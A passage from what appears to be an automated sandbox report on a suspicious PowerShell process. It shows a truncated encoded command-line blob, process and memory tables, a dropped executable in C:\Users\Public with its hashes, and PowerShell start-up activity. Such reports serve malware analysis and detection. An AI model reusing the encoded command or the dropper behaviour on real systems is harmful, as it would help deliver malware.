A3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQAYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBhADUAMAA4AGIANAA0ADMAYgBmADYAMgBkADgAMwBkAGEAMgBiAGQAZgA2AGYANABkADkAYwA3ADkAOQA3AGIAYwBkAGEANABiADgAOAA3ADkAMABlAGUANABjADgANQA5AGMAYwAyADYANgAxADkAZABlADYAZQAwAGMAOABkADkANwA5ADEANwBkADkAMQAwADMAZgAwAGYAZgA1ADcAYgBlADMAYQA4ADcANQBlAGUAZgAyADAAZQBiADcAOAA1ADQAMAAwADgAYwAwADUAMABkAGQAOABlADUAOABjAGEANgBkAGIAMgAyADkAYwA1ADgAMgA5ADcAZQAwADQAMAAzADMAYQA2AGQAZABhADIANgA4AGYANgA4AGYAMQBkADEAYQAwADQAOQA2ADEANQAwAGQAMQBkADgAZABmAGMAMQBjADAAMgBmADEAYgAwADkAMQBmADYANAA0AGYAYQBjADIAZgA4AGEAOAA1ADkAZAAzAGEANQAwADEANQA2ADgAZQA2ADIANwA0ADAAMQA |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:42, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:50 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb28 |
| Parent PID | 0xb0c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B2C
0x
B30
0x
B34
0x
B38
0x
B48
0x
B4C
0x
B64
0x
B7C
0x
B80
0x
B84
0x
BDC
0x
BE8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x00160000 | 0x00162fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x001f0000 | 0x001f3fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00200000 | 0x0021ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x00230000 | 0x00233fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001b60000 | 0x01b60000 | 0x01c5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01c60000 | 0x01c8ffff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01c90000 | 0x01cf5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d10000 | 0x01d10000 | 0x01d10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x01d22fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x01d70000 | 0x01d72fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01d80fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01e0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001e10000 | 0x01e10000 | 0x01eeefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01f6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01f70000 | 0x0223efff | Memory Mapped File | Readable |
|
|
|
- |
| sorttbls.nlp | 0x02240000 | 0x02244fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02250000 | 0x02257fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02260fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002270000 | 0x02270000 | 0x02270fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002300000 | 0x02300000 | 0x026f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortkey.nlp | 0x02700000 | 0x02740fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x02760fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0x027f0000 | 0x02843fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02a1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002a20000 | 0x02a20000 | 0x02b1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x02baffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02beffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x1abeffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001abf0000 | 0x1abf0000 | 0x1b2bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b2c0000 | 0x1b2c0000 | 0x1b3c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x1b3d0000 | 0x1b48ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x000000001b540000 | 0x1b540000 | 0x1b5bffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x1b5c0000 | 0x1b8a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000001b8b0000 | 0x1b8b0000 | 0x1b9affff | Private Memory | Readable, Writable |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74970000 | 0x74a38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| powershell.exe | 0x13f080000 | 0x13f0f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7feddba0000 | 0x7feddd34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7feddd40000 | 0x7feddeabfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7feddeb0000 | 0x7fede554fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fede560000 | 0x7fede59dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fede5a0000 | 0x7fede6b7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fede6c0000 | 0x7fede8d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7fede8e0000 | 0x7fede9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedea40000 | 0x7fedeae9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fedeaf0000 | 0x7fedeb21fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fedeb30000 | 0x7fedeb98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7fedeba0000 | 0x7fedeecdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fedeed0000 | 0x7fedfa2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7fedfa30000 | 0x7fee0452fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee0570000 | 0x7fee144bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x7fee1450000 | 0x7fee1decfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee2960000 | 0x7fee2a11fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fef1f80000 | 0x7fef2018fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fef2020000 | 0x7fef208efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shfolder.dll | 0x7fef3900000 | 0x7fef3906fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7fef55d0000 | 0x7fef55dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x7fef55e0000 | 0x7fef5613fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7fef6d70000 | 0x7fef6deffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7fef6df0000 | 0x7fef6dfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7fef8020000 | 0x7fef8076fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefab30000 | 0x7fefab3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7fefab60000 | 0x7fefab78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7fefaf00000 | 0x7fefaf2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefb790000 | 0x7fefb7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefb7f0000 | 0x7fefb91bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefb970000 | 0x7fefbb63fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc000000 | 0x7fefc00bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7fefc1e0000 | 0x7fefc1fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc430000 | 0x7fefc476fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefc730000 | 0x7fefc746fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7fefcc30000 | 0x7fefcc52fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefcd30000 | 0x7fefcd3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefce40000 | 0x7fefce4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefcf60000 | 0x7fefcf79fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd0f0000 | 0x7fefd125fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefd450000 | 0x7fefe1d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefe1e0000 | 0x7fefe3e2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x7fefe400000 | 0x7fefe451fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe590000 | 0x7fefe600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefe7b0000 | 0x7fefe7cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe7e0000 | 0x7fefe90cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefe910000 | 0x7fefe9e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefeb70000 | 0x7fefed46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefee20000 | 0x7fefeeb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff120000 | 0x7feff1fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007ff00010000 | 0x7ff00010000 | 0x7ff0001ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff000cffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000d0000 | 0x7ff000d0000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff0014ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00150000 | 0x7ff00150000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 73 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\public\119901.exe | 113.50 KB |
MD5:
e1e61c3cc78ea166684120028b97fc02
SHA1: b088f6483da0b4ebc5b7dd66355c97c91bc1e338 SHA256: 053489532b58188bf6ce8476040c70fcff7c69814b4dc98e1801e1d893160d9c |
|
|
Threads
Thread 0xb2c
384
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
